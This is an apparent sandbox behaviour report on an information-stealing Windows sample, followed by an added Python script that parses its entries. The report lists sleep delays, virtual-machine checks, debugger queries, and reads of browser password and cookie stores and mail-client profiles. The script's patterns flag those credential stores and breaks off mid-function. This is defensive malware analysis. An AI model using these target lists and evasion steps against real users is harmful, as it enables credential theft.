                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeThread delayed: delay time: 594235Jump to behavior
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                           Source: Amcache.hve.12.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                           Source: Amcache.hve.12.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
                           Source: Amcache.hve.12.dr | Binary or memory string: vmci.sys
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware20,1
                           Source: Amcache.hve.12.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                           Source: Amcache.hve.12.dr | Binary or memory string: NECVMWar VMware SATA CD00
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                           Source: Amcache.hve.12.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                           Source: Amcache.hve.12.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware PCI VMCI Bus Device
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware VMCI Bus Device
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual RAM
                           Source: Amcache.hve.12.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                           Source: Amcache.hve.12.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware Virtual USB Mouse
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                           Source: Amcache.hve.12.dr | Binary or memory string: vmci.syshbin
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware, Inc.
                           Source: Amcache.hve.12.dr | Binary or memory string: VMware20,1hbin@
                           Source: Amcache.hve.12.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                           Source: Amcache.hve.12.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                           Source: Amcache.hve.12.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                           Source: Amcache.hve.12.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                           Source: Amcache.hve.12.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                           Source: Amcache.hve.12.dr | Binary or memory string: vmci.syshbin`
                           Source: Amcache.hve.12.dr | Binary or memory string: \driver\vmci,\driver\pci
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                           Source: Amcache.hve.12.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                           Source: Amcache.hve.12.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                           Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Process information queried: ProcessInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Process queried: DebugPort
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Process queried: DebugPort
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06708688 LdrInitializeThunk, 0_2_06708688
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Process token adjusted: Debug
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Memory allocated: page read and write | page guard
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Queries volume information: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe VolumeInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                           Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                           Source: Amcache.hve.12.dr | Binary or memory string: msmpeng.exe
                           Source: Amcache.hve.12.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                           Source: Amcache.hve.12.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                           Source: Amcache.hve.12.dr | Binary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                           Source: Yara match | File source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                           Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                           Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                           Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
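The behaviour entries above (the thread-delay run and the hypervisor strings in the evasion section, and the browser and mail-client accesses in the "Stealing of Sensitive Information" section) are what an analyst triages from a report like this, and the extracted page has fused each entry's source, event and the "Jump to behavior" link caption into one string. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses a handful of entries copied from this page (embedded as constructed input, plus one constructed benign file access as a non-hit), checks the delays against the report's own "long sleeps (>= 3 min)" threshold, flags the DebugPort query, counts hypervisor artefacts, and classifies the file and registry accesses against known credential stores. Assumptions that the page does not state: "delay time" is taken to be milliseconds (597502 is then just under ten minutes), the countdown heuristic (each delay roughly 110 to 130 ms shorter than the previous one, as a loop re-sleeping toward a fixed deadline would produce) is our reading of the values, and the Thunderbird, VirtualBox and QEMU patterns are our additions alongside the report's PostboxApp, VMware and Hyper-V hits. Two caveats when reading the counts: Amcache.hve is the analysis machine's own application-compatibility hive, so its VMware strings describe the sandbox hardware rather than anything the sample wrote; and the "VMware20,11696492231" suffix on the sample's in-memory strings appears on browser password-store entries the sample had just read (site names such as netportal.hdfcbank.com and outlook.office.com), so on its own it is weak evidence that the sample checks for a hypervisor.

```python
import re
from collections import Counter

# The sample's on-disk path exactly as the report names it.
SAMPLE_PATH = r"C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"

# Constructed input: entries copied from this report in the fused form the extracted
# page shows (source, event and "Jump to behavior" run together). The notes.txt
# access is constructed and not from the report; it exercises the non-hit path.
REPORT_LINES = [
    f"Source: {SAMPLE_PATH}Thread delayed: delay time: 597502Jump to behavior",
    f"Source: {SAMPLE_PATH}Thread delayed: delay time: 597369Jump to behavior",
    f"Source: {SAMPLE_PATH}Thread delayed: delay time: 597250Jump to behavior",
    "Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev",
    f"Source: {SAMPLE_PATH}Process queried: DebugPortJump to behavior",
    f"Source: {SAMPLE_PATH}Process queried: DebugPortJump to behavior",
    rf"Source: {SAMPLE_PATH}File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    rf"Source: {SAMPLE_PATH}File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior",
    rf"Source: {SAMPLE_PATH}File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior",
    rf"Source: {SAMPLE_PATH}Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior",
    rf"Source: {SAMPLE_PATH}File opened: C:\Users\user\Documents\notes.txtJump to behavior",
]

# Non-greedy source group stops at the first known event name, which is what
# lets the fused lines split without a separator; the trailing link caption
# is matched optionally and dropped.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)"
    r"(?P<event>Thread delayed|Binary or memory string|Process information queried|"
    r"Process queried|Process token adjusted|Memory allocated|Code function|"
    r"Queries volume information|Key value queried|File opened|Key opened)"
    r":\s*(?P<detail>.*?)(?:Jump to behavior)?$"
)

LONG_SLEEP_MS = 3 * 60 * 1000  # the report's "Contains long sleeps (>= 3 min)" threshold
# Assumption: "delay time" is milliseconds; the report does not state the unit.

# Assumption: VirtualBox/QEMU markers are ours; the report only shows VMware and Hyper-V.
# ven_15ad is the VMware PCI vendor ID seen in the Amcache device strings.
VM_ARTIFACT_RE = re.compile(r"vmware|vmci|ven_15ad|hyper-v|vbox|virtualbox|qemu", re.I)

# "DebugPort" is the query the report records; the other two information classes
# are added as an assumption about related anti-debug checks.
ANTI_DEBUG_QUERIES = {"DebugPort", "DebugObjectHandle", "DebugFlags"}

CREDENTIAL_STORES = (
    # Chromium profile databases named in the report (Chrome and Edge share the layout)
    (re.compile(r"\\User Data\\[^\\]+\\(Login Data|Web Data|Network\\Cookies|History|Top Sites)$", re.I),
     "browser-profile"),
    # Mozilla-style mail profile directory; PostboxApp is in the report, Thunderbird is assumed
    (re.compile(r"\\AppData\\Roaming\\(PostboxApp|Thunderbird)\\Profiles", re.I),
     "mail-client-profile"),
    # MAPI profile subkey that holds Outlook account settings
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676$", re.I),
     "outlook-mapi-profile"),
)


def parse_line(line):
    """Split one fused report line into source, event and detail; None if not a behaviour line."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {"source": m["source"].strip(), "event": m["event"], "detail": m["detail"].strip()}


def classify_access(detail):
    """Label a file or registry path as a known credential store, or None."""
    for pattern, label in CREDENTIAL_STORES:
        if pattern.search(detail):
            return label
    return None


def countdown_pattern(delays, max_step_ms=1000):
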